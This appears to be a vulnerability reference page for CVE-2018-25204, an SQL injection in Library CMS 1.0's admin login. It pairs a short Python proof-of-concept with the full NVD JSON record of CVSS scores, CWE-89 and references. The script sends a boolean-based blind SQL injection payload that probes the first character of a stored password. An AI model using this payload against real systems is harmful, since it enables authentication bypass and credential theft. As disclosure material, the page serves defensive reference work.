CVE-2018-25204

import requests def check_sqli(url): # Target login endpoint login_url = f"{url}/admin/login.php" # Assuming path based on common CMS structures # Payload for boolean-based blind SQL injection # This payload attempts to verify if the database sleeps or returns a different response payload = "admin' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a'#" data = { "username": payload, "password": "random" } try: response = requests.post(login_url, data=data, timeout=5) # Analysis logic depends on application behavior (e.g., response time or content) print(f"Status Code: {response.status_code}") print(f"Response Length: {len(response.text)}") # In a real exploit, logic would compare this to a baseline request except Exception as e: print(f"Error connecting to target: {e}") # Example usage # check_sqli("http://127.0.0.1")

{"cve": {"id": "CVE-2018-25204", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.247", "lastModified": "2026-03-31T01:15:27.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Library CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to bypass authentication by injecting SQL code through the username parameter. Attackers can send POST requests to the admin login endpoint with boolean-based blind SQL injection payloads in the username field to manipulate database queries and gain unauthorized access."}, {"lang": "es", "value": "Biblioteca CMS 1.0 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados eludir la autenticación inyectando código SQL a través del parámetro de nombre de usuario. Los atacantes pueden enviar solicitudes POST al endpoint de inicio de sesión de administrador con cargas útiles de inyección SQL ciega basada en booleanos en el campo de nombre de usuario para manipular consultas de base de datos y obtener acceso no autorizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wecodex:library_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E449D841-3BB9-4F7B-A2AB-5A65A1CE002E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44728", "source": "[email protected]", "tags": ["Exploit", "VDB Entry", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/library-cms-sql-injection-via-admin-login", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wecodex.com/item/view/library-management-system-in-php-and-mysql/1", "source": "[email protected]", "tags": ["Broken Link"]}]}}